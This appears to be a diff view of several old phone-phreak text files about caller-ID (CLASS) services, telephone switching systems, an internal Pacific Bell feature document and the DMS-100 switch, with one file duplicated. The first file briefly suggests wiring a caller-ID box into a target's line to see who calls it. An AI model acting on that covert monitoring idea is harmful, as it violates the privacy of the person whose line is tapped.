standing for Calling Number Display and/or Calling Number ID respectively.
What CNI does is allow the customer to rent or purchase a little black box
that looks like a hand calculator, which displays the number of the calling
party after the first ring whether or not thephone is answered. A small LCD
display provides the caller's phone number including area code, the current
time, and the date.
Most of the units also store about 70 num- bers in memory so if the operator
is not home one can still see who called even if the answer- ing machine is
stressed out. In fact, with a little creativity one can figure out who called
and didn't leave a message by comparing messages on the answering machine or
voice mail with the incoming call register numbers.
CND's have generated an enormous amount of interest in the press and the
media because of the apparent violation of privacy involved. The justification
for this service is to stop obscene phone calls as well as letting the caller
decide with whom he wishes to speak at any given moment. The down side
includes several things, first and foremost being that it will: (A) cost money
to rent this little box or pur- chase it from the phone company, (B) cost more
money if one doesn't want one's phone number to be displayed on out-going
calls, effectively letting the phone company collect revenues on either side
of the transaction.
People who are concerned with their privacy are notably aghast at this
situation. Why should I have my number displayed if I call someone to inquire
about a product or ask about a service or even return a call? Think some
sleazy salesman won't call back? Think I won't immediately be placed on a
mailing list and probably on a dial-out marketing list that will be sold to
other vendors who want to find suckers who respond to a particular pitch?
Bet your ass...
CLASS also allows a number of other options including a customer originated
trace, which means by dialing a number i.e., #57 the last call one receives
will be immediately traced and recorded at the phone company. Of course, the
phone company charges (at the moment, a buck) for this service and to com-
plete the transaction one must call the phone company and ask for the number.
This feature is designed for harassment-type callers and the phone company
is probably going to want to know why one wants the number requested.
A sidebar here, if one has call-waiting one can do an interesting thing with
the CLASS concept. When you hear the call-waiting notification buzz, simply
tell the party you are talking to that you will call them back and immediately
hang up the phone. They will be disconnected and the phone will begin to ring
for the person who originally clicked in. After the first ring your display
will light up and translate the data that was sent from the calling party,
letting you trace a call on call-waiting without ever talking to the person.
Other items that will come along with CLASS are things like Selective Call
Acceptance or Rejection, which allows you to automatically reject calls from
certain numbers. Distinctive Ringing which will invoke a particular ringing
pattem so you can tell if it's a good or bad call before even looking at the
display, and CNDBlocking, which means the called party can program a que of
people into his phone so when they call the number they get a recorded message
from the phone company that says, "Party you are tryin' to reach don't want to
talk to ya, bro," or perhaps a more politely phrased message with the same
meaning.
CLASS services are of interest to our business for a variety of reasons, the
first being they can be used in a manner similar to an ANI trace or with some
aeative plumbing, one's personal call display box can be wired into a target's
number where it will act not only as a reversed dialed number recorder, but
actually show where all the calls to the target number are coming from...
The calling number display feature of the CLASS system DOES trace
unpublished numbers as well as published numbers. It's up to the individual
phone company whether they will be displayed on the user's display or not.
There is no way to use a display box on a particular phone system that does
not have the CLASS feature installed, both components are neces- sary for the
system to function.
BEATING THE CLASS
If one doesn't want one's phone number to be displayed at the other end, one
can: (A) purchase a call-blocking service from the phone company, (B) make all
one's calls from a pay phone, (C) go through the operator to place a call, or
(D) use a service some entrepre- neurs have come up with where the caller
dials their 900 number and dial out on their dial tone for an additional
charge. The other possi- bility is a creative placement of a call forward- ing
box.
I don't know, Yogi, everybody on the side of law and order, not to mention
telephone employees with an eye towards their profit sharing plan, seem to
think the CLASS system is the greatest thing since sliced bread, but it seems
to me that it's just another step in the direction of 1984. Oh, hell, that was
years ago, wasn't it? I guess there's a moral in there.
+175
View File
@@ -0,0 +1,175 @@
Comprehensive Look at Switching Systems
by Terminus
This file was originally posted on MetroNet: 'The Intelligent Phreak's Choice'
@ 301-944-3023 * 24 hours
Switching Generations
The whole concept of dial or automatic switching is the basis of telephone
communications today.When one of the millions of telephone users lift a hand-
set,switching equipment located in the c.o. will:
o Locate and identify the calling line
o Give the signal to proceed ( dial tone ).
o Determine how and where to get access to it.
o Locate and test the numerous transmission paths leading to it.
o Select and link up the most appropriate combination of these paths.
o Then,if it is not in use, ring the called destination number.
A serving vehicle has carried out the switching function.Since 1891,when the
Strowger automatic system was publicized as the 'girl-less,wait-less tel.',
switching has taken three big steps,most of them during the last 20 years.
There are three main switching generations:
1. Step by Step,direct or progressive
2. Crossbar
3. Common Control
The last divides into electronic and computer based solutions.The step by step
system was first born before the beginning of this century.It was the basis of
the first private branch exchange (PBX).With the introduction of the step by
step PBX,'number,please' manual switchboards rapidly disappeared.Intraoffice
conversations were established by direct dialing.
The first generation switching systems were also called POTS (plain old
telephone systems),and many businesses requiring dial switching still use
them.Such systems can be expanded indefinitely as long as space can be pro-
vided for the bulky frames and switches they require.In step by step switch-
ing,a call progresses one step at a time as the telephone user dials each
successive digit of the destination number.The system is also called direct
control because each switching function is directly controlled by the pulses
from the dialing telephone.The switch train is composed of:
o the line finder
o the selector
o the connector
The dial pulses from the calling telephone directly control the switches that
establish the desired connection.This is simple,economical and a complete
modular solution except that it is totally obsolete.This is due to the high
cost of maintenance,switching delays,no place to put the huge monsters,and
also due to the inherent noise (electrical) will cause problems with data
being sent through the lines,from MetroNet to your modem..haha (had to toss it
in seeing that I am writing this phile..)
Common Control employs logic circuitry.Address digits generated by the dialing
instrument are stored,translated,and flexibly used for switching within the
system,or for establishing a connection with the outside network.The switching
equipment stores the entire number,then the operation starts.
Crossbar has been a milestone preceeding the electronic common control tech-
nology,and many consider it as the first phase of common control.The crossbar
switch is much smaller than the step switch.When they were introduced,crossbar
systems provided many helpful features (haha),but they have been overtaken by
electronics.Five key components make up this system:
o The Marker is the portion of the switch through which all calls must pass.It
identifies a line requesting service and assigns it to an originating reg-
ister.
o The Originating Registers record the number dialed.
o The Register/Scanner is a dual circuit in electronic crossbar systems which
may perform the marker and originating register functions.
o The Matrix consists of a set of horizontal and vertical bars.To close a set
of cross-points,the horizontal bar moves first.The point at which these two
meet establishes the connection.
o The Sender,or trunk interface unit is the equipment used to process calls
from the PBX to the serving central office.
Common Control equipment makes it possible to adopt flexible numbering plans
to meet a carrier's requirements and,in the case of private interconnect
systems to meet many specific user applications.
Common Control equipment also premits new features to be readily adapted;they
need only be applied to the circuits.Even when we talk about crossbar technol-
ogy,at the central office switching level the sender transmits the called num-
ber to the different types of distant,central office equipment.All told,I
speak of a specialization of functions which largely revamped the way switch-
ing was working with the step-by-step system.
As in the 1970's,however,rapid technological advances in computer design
channeled into telephone switching have changed the system further.
ELECTRONIC SWITCHING SYSTEMS: The Greatest Threat and the Greatest Tool!
Electronic Switching Systems (ESS's) offer the greatest potential for both
voice and data communications,together with the capability for an almost
bewildering array of internal service features.An ESS consists of:
o A computer
o Memory or Storage
o Programming Capability
o An extremely rapid switching component
The principal advantages of the stored program are that it allows the system
to expand it's capability to perform self-diagnostic checking and automatic
reporting of malfunctions,enables the technicians to perform many system
changes,and permits inputting new requirements through tele-typewriter term-
inals rather than by manually re-wiring various switch point connections.
Note: See Cosmos Tutorials...
A computer-based common control switching equipment implies two distinct type
of units:
o Control
o Switching
The Common Control recieves,stores,and interprets dial pulses,and then selects
an available path through the Switching hardware to complete a connection.
Paralell processing on common control equipment for only a portion of a call
is very important.Once the connection for a call between two telephones has
been made,common control releases and can complete more calls while the two
parties are talking.
Effecient high speed common control equipment can complete many calling con-
nections during the time of the average phone call.Thus it saves alot of time
and money for A.T.T..This is the prime difference between common and progress-
ive step by step control switching systems.
Furthermore,the switching network can be directed for many lines by one common
group of control devices.The control unit is the brain of this switching sys-
tem;it can typically complete it's function for a single call in a small
fraction of a second,allowing it to service many stations and lines.
An important element of the various ESS offerings is the computer's ability
to perform a wide variety of traffic analysis and telephone related account-
ing functions.. { this is the killer,people.. }.For these very reasons,elec-
tronic switching systems have found an expanding market in PBX at different
levels of sophistication.
ESS is not the latest in developments,and electronic switching is still per-
formed by electromechanical devices.Improvements come one at a time.First,
wire relays provide the logic required for supervision and control over the
system.Sometime later,computer based software is used for control and super-
vision.
Essential to the performance of switching functions through solid state
circuitry is that no moving parts are employed,but the basic concepts do not
necessarily change.Many of the features incorporated into ESS originated in
the crossbar era.Let's take a look at them one by one:
Station Transfer: sees to it that the user can transfer an incoming call from
outside the office to any telephone within the crossbar
system.This eliminates the use of a switchboard operator
for call transfer.Consult and Hold assures that an incoming
call can be held while the person dials another number to
secure information for the caller.Through an Add-On Confer-
ence a third person may be dialed so that the outside caller
,the call recipient,and the third person may conduct a three
way conversation.
Camp On: an interesting feature! If the user's line is busy,the operator can
'camp' an incoming call onto the station line.When the user hangs up,
their telephone rings,and the waiting call is connected.When the call
is camped,the user hears a beep indicating that a call is waiting.
Night Answer: provides that after the switchboard closes,audible signals
announce calls arriving on central office trunks.Any person
working after hours can dial a code,pick up the incoming call
and transfer it to the person sought.With selective toll
restriction,a particular station is permitted to make local
calls but the equipment rejects any long distance dialing.This
applies to a small PBX system rather that C.O. type hardware.
All cross bar systems offer these features;however,for lack of training,a
large percentage of phreaks are not aware of them.
Many more sophisticated capabilities are available with switching systems that
are computer-run.The computer is programmed to produce almost any feature de-
signed by the user.Such facilities are contained n the central switch,not in
the telephone instrument.The user commands the computer by dialing specified
codes related to each available function.In the more expensive electronic PBX
systems a function key is pressed to energize a certain attribute.

+289
View File
@@ -0,0 +1,289 @@
No. 1/1A ESS Div. 3, Sec. 1z(3)
Corporate Software Standards Draft Issue 3/12/90
CUSTOM LOCAL AREA SIGNALING SERVICES (CLASS)
1.0 INTRODUCTION
1.01 GENERAL INFORMATION
AT&T developed a set of 1A ESS revenue generating
features called LASS (Local Area Signaling Services).
Pacific Bell requested customized software enhancements
for some of the features, and will refer to them as CLASS
(Custom Local Area Signaling Services). Documentation
may refer to either acronym.
The CLASS features allow increased customer control of
phone calls. Existing customer lines can be used to
provide call management and security services. The
primary basis of CLASS is that the terminating office can
obtain the identity of the calling party. Special
terminating treatment based on the identity of the
calling party can then be provided.
The CLASS features are dependent upon an SS/CCS
(Signaling System 7/Common Channel Signaling) network and
use the SS7 Call Management Mode of operation. SS7 is
the next generation signaling system that features
flexible message formatting, high speed data transmission
(56/64 kbps) and digital technology. CCS is defined as a
private network for transporting signaling messages. In
the existing voice and signaling network, signaling and
voice use the same path but cannot use it at the same
time. With SS7, signaling and voice have been
separated. Signaling (SS7) is over a high-speed data
link which carries signaling for more than one trunk.
Refer to Corporate Software Standards, Division 3,
Sections 1z(1) and 1z(2) for more information on SS7/CCS.
In the initial deployment, the CLASS features will only
work on intraLATA calls that are originated from and
terminated to switches that are SS7 capable.
Although CLASS features will be marketed and sold under
the Commstar Custom Calling Feature label, the features
will not be available for Centrex and Commstar II
customers initially. However, like the other Commstar
features, most of the CLASS services can be added to
existing telephone equipment and will work on Touch Tone
or Rotary sets.
The Tracking Code (TC) for installation, translation and
trunk work associated with CLASS is 299. All time spent
on CLASS should be coded to the TC in order to ensure
proper time reporting.
1.02 REASON FOR ISSUANCE
This document is being issued in order to incorporate
Methods and Procedures with Corporate Software Standards
for the CLASS features.
Subsequent changes to this document will be noted with a
(>).
1.03 DESCRIPTION
Seven features, plus Number ID Blocking, Screen List
Editing, and Line History are available with the initial
deployment of CLASS in the 1A ESS. Pacific Bell renamed
the AT&T features; Bellcore has their own feature
names. Documentation may refer to any of the names as
noted below.
Pacific Bell AT&T BELLCORE
------------ ---- --------
Call Block Selective Call Selective Call
Rejection (SCR) Rejection
Call Return Automatic Callback Auto Recall
(AC)
Call Trace Customer Originated Customer Originated
Trace (COT) Trace
Number ID Individual Calling Calling Number
Line ID (ICLID) Delivery
Number ID Privacy Calling Number
Blocking Delivery Block
Priority Distinctive Alerting Distinctive Ringing/
Ringing (DA) Call Waiting
Repeat Automatic Recall Auto Callback
Dialing (AR)
Select Call Selective Call Selective Call
Forwarding Forwarding (SCF) Forwarding
NOTE: Bulk Calling Line ID (BCLID) will not be offered
with the initial deployment of CLASS features.
Following is a brief description of the CLASS features as
well as Line History and Screen List Editing.
CALL BLOCK The Call Block feature allows the customer
to not receive, or block, calls from a
pre-specified list of telephone numbers.
The telephone numbers are placed on a Call
Block Customer's Screening List. When the
calling telephone number matches a number
on the screening list, the calling party
receives a rejection announcement. The
customer blocking the calls (called
number) does not receive any indication
that a call was made.
Activation Code: *60
Deactivation Code: *80
CALL RETURN When activated, the Call Return feature
initiates a call to the last telephone
number who called the subscriber. If the
calling number is idle, the call completes
immediately. If the calling number is
busy, the request is queued until the line
is idle or he request times out. This
feature can be used to re-establish a
previous incoming call, or to contact a
party who called while the customer was
unavailable.
Activation Code: *69
Deactivation Code: *89
CALL TRACE Call Trace allows the called party to
initialize an automatic trace of the last
incoming call received. When the customer
activates a trace, a message containing
the following information is output to the
SCC Maintenance Channel:
1. Time the trace was activated
2. DN of the calling party
3. MLHG/multiline indicator
4. DN and LEN of the customer
requesting the trace
5. Date and time of the TTY message
6. Date and time the call being
traced was received
7. Privacy Indicator
8. CWT Indicator
Activation Code: *57
No Deactivation Code required
LINE HISTORY Line History provides memory to store the
Last Call Directory Number (LCDN), service
routines to access the memory and logic to
retrieve the LCDNs. Only the LCDN of the
most recent originating and terminating
call is saved. A permanent Line History
Block is maintained for each line in a
CLASS office. The LCDN is used in all
CLASS features.
NUMBER ID The Number ID feature enables the customer
to identify the calling party before the
call is answered. After the first ring,
the calling party's DN is displayed on
customer premises equipment (CPE). When
the calling party's location is not CLASS
equipped, or their telephone call is
marked private, a code will be appear on
the CPE display (e.g. '000-0000' or
'private' or 'out-of-area'); the display
is up to the CPE vendor.
No Activation/Deactivation Codes are
required.
NUMBER Number ID Blocking allows a customer to
ID make their telephone number private on a
BLOCKING per call basis by dialing an activation
code prior to the called number. The term
'private' means that although the calling
number is sent to the far end, it is
marked private so that there will be no
ICLID display of the number; the calling
number can still be traced using Call
Trace and can also be added to screen
lists.
This capability is available to all
customers in a 1A ESS switch that has
CLASS, whether or not they have the Number
ID feature.
Activation Code: *67
PRIORITY This feature provides a distinctive ring
RINGING to the subscriber when incoming calls
originate from telephone numbers
pre-defined on a Priority Ringing List.
When the customer with Priority Ringing
receives a call and the calling number is
on the list, the called party receives:
Special ringing tone if the called
number is idle, or
If the called customer has Call
Waiting and is on a call, they will
receive a special tone indicating
that a number on their Priority
Ringing List is trying to reach them.
Activation Code: *61
Deactivation Code: *81
REPEAT Upon activation, Repeat Dialing
DIALING automatically redials the last otgoing
call dialed from the subscriber's line.
It does not matter whether the last call
dialed from the customer's line was busy
or idle, answered or unanswered.
Repeat Dialing is available to POTS and
multiline hunt customers as long as the
ring back can be directed to a particular
number on a unique LEN.
If a call cannot be completed immediately
due to a busy line, the customer receives
a confirmation tone, the call is queued
and recall completion is attempted when
both parties are idle. The customer with
Repeat Dialing receives ring-back ringing
(2 short 1 long within six seconds) and
upon answering the called party receives
regular ringing.
Once Repeat Dialing has been activated,
the busy/idle status of the called and
calling lines is checked every 45 seconds
for 30 minutes.
Activation Code: *66
Deactivation Code: *86
SCREEN LIST Screen List Editing allows subscribers to
EDITING build and change the lists of telephone
numbers associated with the Call Block,
Select Call Forwarding and Priority
Ringing CLASS features. When editing, the
subscriber may also hear the entries on
the list and obtain instructions. A
screening list is activated when it is
initially created during feature
activation. When the screening list is
active and has at least one number on it,
the corresponding feature is on.
An individual list of DNs is required for
each feature that uses screening lists and
is associated with the customer's line.
SELECT CALL This feature automatically forwards
FORWARDING incoming calls from telephone numbers that
have been pre-defined on the subscriber's
Select Forwarding List. Select Call
Forwarding is totally independent from
Call Forwarding Variable. Separate
activations and 'forward to' numbers will
be required. Both features may be
activated simultaneously.
Activation Code: *63
Deactivation Code: *83
NOTE: On Rotary sets, the '*' is replaced with '11'
on all activation/deactivation codes.
+117
View File
@@ -0,0 +1,117 @@
][==================================][
|| ||
|| Circuit Switched Digital ||
|| Capability ||
|| ------------------------- ||
|| Written by ||
|| ||
|| The Executioner ||
|| ||
|| and the ||
|| ||
|| [+] PhoneLine Phantoms [+] ||
|| - - - ||
][==================================][
The Circuit Switched Digital Capability feature provides for the end-to-end
digital transmission of 56 kilobits per second (kb/s) data and, alternately,
the transmission of analog voice signals on a circuit switched basis. The CSDC
feature was formerly known as PSDC (Public Switched Digital Capability). Both
terms are used in practice because of translations, set cards and etc.
requiring the PSDC term. The CSDC term is used for customer identification and
explanation. The CSDC feature provides an alternate voice/data capability. If
the loop is a wire loop, CSDC utilizes time compression multiplexing (TCM)
which allows for the transmission of digital signals over a common path using a
separate time interval for each direction. During a CSDC call the caller may
alternate between voice and data as many times as desired. CSDC can support
subvariable data rates but a 56 kb/s is used in the network.
Some applications for CSDC:
1. Audiographic teleconferencing
2. Secure voice
3. Facsimile
4. Bulk data
5. Slow scan television
A typical CSDC call is originated over a 2-wire loops which can be used for
message telecommunications service (MTS) and touch tone is required. Calling
can be done by automatic calling equipment (ACE) or manually. Digit reception,
transmission, and signalling follow the same procedures used for MTS outgoing
calls on CCIS or non-CCIS trunks. However, CSDC calls are always routed over
digital transmission facilities.
=================
=Long term plans=
=================
The long term plan allows for Equal Access Multi-frequency (EA-MF) signalling
and improved AMA. A CSDC call attempt is screened to ensure that the calling
party has CSDC and the carrier used provides 56 kb/s alternate voice/data at
the office. A blocked call is routed to a special error message. A CSDC call is
routed directly to the carrier or indirectly via the access tandem (AT) or
signal conversion point (SCP). The call is terminated directly from the carrier
to the end office or indirectly via the AT or SCP. Signalling for direct
routing is either CCIS or EA-MF and is assigned on a trunk group basis.
The AT is a 1A ESS switch which allows access to carriers form and end office
without requiring direct trunks. Signalling between the end office and the AT
is either EA-MF or CCIS, Trunk groups using EA-MF signalling can have combined
carrier traffic. Separate trunk groups for each carrier are required for CCIS
signalling.
The SCP is a 1A ESS switch which allows access to carriers using only CCIS
signalling from offices without the CCIS capability. Separate trunk groups for
each are used between the originating end office and the SCP. Separate trunk
groups are optional between the SCP and the terminal end office. Signaling
between the end office and the SCP is MF. The SCP must have direct connection
to the carrier using CCIS.
CSDC is also available for Centrex/ESS X-1customers. Most of the capabilities
of centrex service can be applied to the CSDC feature. CSDC provides the
following for the centrex group:
1. Message Network Basis
2. Intracentrex group basis
3. Intercentrex group basis
4. Any combo of above
=========
=Dialing=
=========
To establish a CSDC call, a user dials the following:
#99 AB (1+) 7 or 10 digits (#)
The user dials '#99' to access CSDC and AB is the carrier being used. The '#'
is used optional for end of dialing indicator. The long-term dialing plan is as
follows:
#56 (10XXX) (1+) 7 or 10 (#)
Dialing 56 means 56 kb/s. The 10XXX identifies the carrier. If 10XXX is not
dialed on an Inter-LATA call, the primary subscriber is used. If 10XXX is not
dialed on an Intra-LATA call then the local Telco handles it.
=================
=Switching Modes=
=================
Suppose Party A wants to switch from voice to data. Party A issues a mode
switch command and then receives a signal called a far end voice (FEV) bipolar
sequence (2031 hz at 60 ipm). Party A can now hang up any time. Party B
receives a far end data tone at 2031 hz at 39 ipm indicating that Party A wants
to do some data transfer. Then Party B must initiate a mode switch command.
Party B then hangs and transmission is possible.
TO switch back to voice, Party A initiates a mode switch command and this
time receives an FED tone, and B gets an FEV tone. Party B then picks up and
does a switch then the voice is established.
=====================================
= (C) 1985 Sexy-Exy & The PLP =
=====================================
Dedicated to The Guardian Demon.
+180
View File
@@ -0,0 +1,180 @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ _ _ _______ @
@ | \/ | / _____/ @
@ |_||_|etal / /hop @
@ __________/ / @
@ /___________/ @
@ Private/AE/Brewery @
@ @
@ Presents: @
@ @
@ Digital Multiplex System (DMS) 100 @
@ by @
@ Knight Lightning @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
This file is of course about DMS 100. Expect full length files about the other
variations of DMS (DMS 200 & 250) coming a later date. Much of the information
in this file was obtained from manuals acquired from Jester Sluggo. Note: IBN
stands for Integrated Business Network.
_______________________________________________________________________________
DMS-100
-------
The DMS-100/IBN consists of electronic business sets and standard telephones,
data units, and attendant consoles, all located on the customer's premises; and
DMS-100 digital switching, and support hardware/software, located at the
telephone company's premises. Together they create an integrated business
communications network that provides an unparalleled combination of features
and benefits.
o DMS-100/IBN integrates voice and data in a total business communications
system.
o Effectively serves all sizes of organizations, from small businesses using
only a few lines, to the most complex network systems with up to 30,000
lines.
o The IBN system monitors and controls its own operations automatically;
diagnoses problems; and in some cases, does its own repairs.
o Fully modular, to meet present needs, and accommodate new features as they
are needed.
o Cost effective: Helps control communications costs through more efficient
use of facilities; centralization of attendant service where needed; Call
Dial Rerouting (CDR) to control and restrict long-distance calling; and
network management.
o Worry free operation-Northern Telecom's DMS-100 digital switches are backed
up by highly trained telephone company personal.
-------------------------------------------------------------------------------
Some of the other features that DMS 100 has include:
o Automatic Route Selection - automatically routes long distance calls over
the most economical route available.
o Station Message Detail Recording - provides a detailed record of long
distance charges, including the originating number, time, and duration,
authorization code, etc.
o Direct Inward System Access (DISA) - enables company personnel to use
cost-saving company facilities for long distance calling, even from outside
the company.
-------------------------------------------------------------------------------
System Features and Benefits
-------------------------------------------------------------------------------
Note: I will list all the features, but I will only go into detail about the
important ones.
ATTENDANT CONSOLE
-----------------
Call Waiting Lamp
Loop Keys - There are 6 loop keys, each with its associated source and
destination lamp to indicate the calling and called party states.
Alphanumeric Display
Multiple Directory Numbers
Feature Keys - Up to a total of 42. Some of them could be used for Speed
Calling and Paging System.
Incoming Call Identifier
Exclude Source/Exclude Destination - privacy keys
Signal Source/Signal Destination: Release Source/Release Destination
Console Features
----------------
Access to paging Call hold
Call detail entry Remote console
Call Selection Console display
Camp-on Automatic recall
Conference - 6 port Two-way splitting
Non-delayed operation Attendant transfer
Locked loop operation Busy verification of lines
Manual and automatic hold Multiple console operation
Busy verification of trunks Switched loop operation
Trunk group busy indication Uniform call distribution form queue
Multiple listed directory numbers Control of trunk group access
Secrecy Night service
Serial call Speed calling
Lockout Delayed operation
Position busy Interposition calling
Through dialing
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ELECTRONIC BUSINESS SETS
------------------------
LCD Indicators
Call Forwarding
Automatic Line
Call Pick-up
Ring Again - automatically redials busy numbers until they are free
Multiple Directory Numbers
Intercom
Speed Call
Call Transfer/Conference
On-Hook Dialing
Additional Programmable Features
--------------------------------
Automatic Hold
Listen-on Hold
Multiple Appearance Directory Numbers (MADN)
- Single Call Arrangement
- Multiple Call Arrangement
Privacy Release
Tone Ringing with Volume Control
End-to-End Signaling
Call Park
Make Set Busy
Malicious Call Trace
Busy Override
Attendant Recall
Call Waiting
Stored Number Redial
Private Business Line
32 Character Alphanumeric Display
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DATA UNIT
---------
The DMS-100/IBN Data Unit makes information accessing as easy to learn and to
use as the telephone. It can be used as a "Standalone" or attached to the
Business Set or standard telephone, for integrated voice and data telephone
telecommunications.
Transmits over simple 2-wire loops, at speeds of up to 56 kb/s, using Northern
Telecom's proprietary Time Compression Multiplexing technology; Compatible with
existing computer and data terminal equipment, and is available in different
low-speed and high-speed models, to suit existing terminal capacity.
Benefits
--------
o Combines with Business Set or standard telephone, to provide integrated
voice/data communications.
o Your data unit and telephone can operate together simultaneously or totally
independent of each other.
o Fully digitalized, eliminating bulky analog modems.
o Ring Again (constant redial on busy numbers)
o Speed Calling
-------------------------------------------------------------------------------
For further information contact:
Digital Switching Systems Sales
Northern Telecom Inc.
P.O. Box 13010
4001 East Chapel Hill -- Nelson Highway
Research Triangle Park
North Carolina 27709
Tel: (919) 549-5000
Switching Group Sales, Department S-70
Northern Telecom Canada Limited
8200 Dixie Road, P.O. Box 3000
Brampton, Ontario
L6V 2M6
Tel: (416) 451-9150
_______________________________________________________________________________
+177
View File
@@ -0,0 +1,177 @@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ _ _ _______ @
@ | \/ | / _____/ @
@ |_||_|etal / /hop @
@ __________/ / @
@ /___________/ @
@ Private/AE/Brewery @
@ @
@ Presents: @
@ @
@ Digital Multiplex System (DMS) 100 @
@ by @
@ Knight Lightning @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
This file is of course about DMS 100. Expect full length files about the other
variations of DMS (DMS 200 & 250) coming a later date. Much of the information
in this file was obtained from manuals acquired from Jester Sluggo. Note: IBN
stands for Integrated Business Network.
_______________________________________________________________________________
DMS-100
-------
The DMS-100/IBN consists of electronic business sets and standard telephones,
data units, and attendant consoles, all located on the customer's premises; and
DMS-100 digital switching, and support hardware/software, located at the
telephone company's premises. Together they create an integrated business
communications network that provides an unparalleled combination of features
and benefits.
o DMS-100/IBN integrates voice and data in a total business communications
system.
o Effectively serves all sizes of organizations, from small businesses using
only a few lines, to the most complex network systems with up to 30,000
lines.
o The IBN system monitors and controls its own operations automatically;
diagnoses problems; and in some cases, does its own repairs.
o Fully modular, to meet present needs, and accommodate new features as they
are needed.
o Cost effective: Helps control communications costs through more efficient
use of facilities; centralization of attendant service where needed; Call
Dial Rerouting (CDR) to control and restrict long-distance calling; and
network management.
o Worry free operation-Northern Telecom's DMS-100 digital switches are backed
up by highly trained telephone company personal.
-------------------------------------------------------------------------------
Some of the other features that DMS 100 has include:
o Automatic Route Selection - automatically routes long distance calls over
the most economical route available.
o Station Message Detail Recording - provides a detailed record of long
distance charges, including the originating number, time, and duration,
authorization code, etc.
o Direct Inward System Access (DISA) - enables company personnel to use
cost-saving company facilities for long distance calling, even from outside
the company.
-------------------------------------------------------------------------------
System Features and Benefits
-------------------------------------------------------------------------------
Note: I will list all the features, but I will only go into detail about the
important ones.
ATTENDANT CONSOLE
-----------------
Call Waiting Lamp
Loop Keys - There are 6 loop keys, each with its associated source and
destination lamp to indicate the calling and called party states.
Alphanumeric Display
Multiple Directory Numbers
Feature Keys - Up to a total of 42. Some of them could be used for Speed
Calling and Paging System.
Incoming Call Identifier
Exclude Source/Exclude Destination - privacy keys
Signal Source/Signal Destination: Release Source/Release Destination
Console Features
----------------
Access to paging Call hold
Call detail entry Remote console
Call Selection Console display
Camp-on Automatic recall
Conference - 6 port Two-way splitting
Non-delayed operation Attendant transfer
Locked loop operation Busy verification of lines
Manual and automatic hold Multiple console operation
Busy verification of trunks Switched loop operation
Trunk group busy indication Uniform call distribution form queue
Multiple listed directory numbers Control of trunk group access
Secrecy Night service
Serial call Speed calling
Lockout Delayed operation
Position busy Interposition calling
Through dialing
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ELECTRONIC BUSINESS SETS
------------------------
LCD Indicators
Call Forwarding
Automatic Line
Call Pick-up
Ring Again - automatically redials busy numbers until they are free
Multiple Directory Numbers
Intercom
Speed Call
Call Transfer/Conference
On-Hook Dialing
Additional Programmable Features
--------------------------------
Automatic Hold
Listen-on Hold
Multiple Appearance Directory Numbers (MADN)
- Single Call Arrangement
- Multiple Call Arrangement
Privacy Release
Tone Ringing with Volume Control
End-to-End Signaling
Call Park
Make Set Busy
Malicious Call Trace
Busy Override
Attendant Recall
Call Waiting
Stored Number Redial
Private Business Line
32 Character Alphanumeric Display
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DATA UNIT
---------
The DMS-100/IBN Data Unit makes information accessing as easy to learn and to
use as the telephone. It can be used as a "Standalone" or attached to the
Business Set or standard telephone, for integrated voice and data telephone
telecommunications.
Transmits over simple 2-wire loops, at speeds of up to 56 kb/s, using Northern
Telecom's proprietary Time Compression Multiplexing technology; Compatible with
existing computer and data terminal equipment, and is available in different
low-speed and high-speed models, to suit existing terminal capacity.
Benefits
--------
o Combines with Business Set or standard telephone, to provide integrated
voice/data communications.
o Your data unit and telephone can operate together simultaneously or totally
independent of each other.
o Fully digitalized, eliminating bulky analog modems.
o Ring Again (constant redial on busy numbers)
o Speed Calling
-------------------------------------------------------------------------------
For further information contact:
Digital Switching Systems Sales
Northern Telecom Inc.
P.O. Box 13010
4001 East Chapel Hill -- Nelson Highway
Research Triangle Park
North Carolina 27709
Tel: (919) 549-5000
Switching Group Sales, Department S-70
Northern Telecom Canada Limited
8200 Dixie Road, P.O. Box 3000
Brampton, Ontario
L6V 2M6
Tel: (416) 451-9150
+409
View File
@@ -0,0 +1,409 @@
The DMS switching system, is a lot smaller than normal systems. It takes up
less than 16% of the space for the same number of Step-By-Step (SXS) lines and
20% of cross bar. This is done by taking the hardware out of the CO and
putting them closer to a group of subscribers. Then central office services
can be provided over shorter loops.
DMS offers remote switching with a bunch of remote modules in a bunch of
sizes and capabilities. Some include SXS replacement or growth, Outside plant
cable relief, and Office feature's. The use of remote modules give the CO
more floor space that would usually be used by the Line Concentrating Modules
(LCMs), Main Distribution Frame (MDF), and cable equipment. The advantage of
these modules is that it extends the service radius of the CO, this means
outside plant savings. Remote modules can be located up to 150 miles away
without messing up transmissions.
Other advantages of the DMS system are that it allows integration between
Transmission facilities and switching systems. It's hardware & software is
designed to give a full range of switching applications for Private Branch
Exchange (PBX) business systems, local, toll, and local/toll requirements. The
same Central Control Complex (CCC) and switching networks are used throughout
the whole system. The only difference between each system is the peripheral
units, and software packages. It has a Maintenance and Administration Position
(MAP) which is a integrated multifunction machine interface that switch
maintenance, line and trunk network management, and service order changes can
be carried out.
The software for the central processor is written in PROTEL, a high level
pascal based language. Peripheral processors use a XMS-Pascal software
language.
DMS has a high line and trunk capacity. It has up to 100,000 lines on a
DMS-100 or 60,000 trunks on a DMS-200. It also gives up to 1.4 million
two-way CCS through the switching network. The processor can accept up to
350,000 call attempts.
Here's a list of the DMS systems in use today:
DMS-100 - is a class 5 local office with the ability to handle 1,000 to
100,000 lines. It can give basic telephone service or expanded to handle IBN
custom calling features. The DMS-100 MTX gives cellular radio services. A
local office can also be adapted to Equal Access End Office (EAEO).
Remote Switching Center (RSC) - Ability to handle up to 5,760 lines.
Remote Line Concentrating Module (RLCM) - Ability to handle up to 640 lines.
It uses host Line Concentrator Module (LCM) that can be used by the RSC or
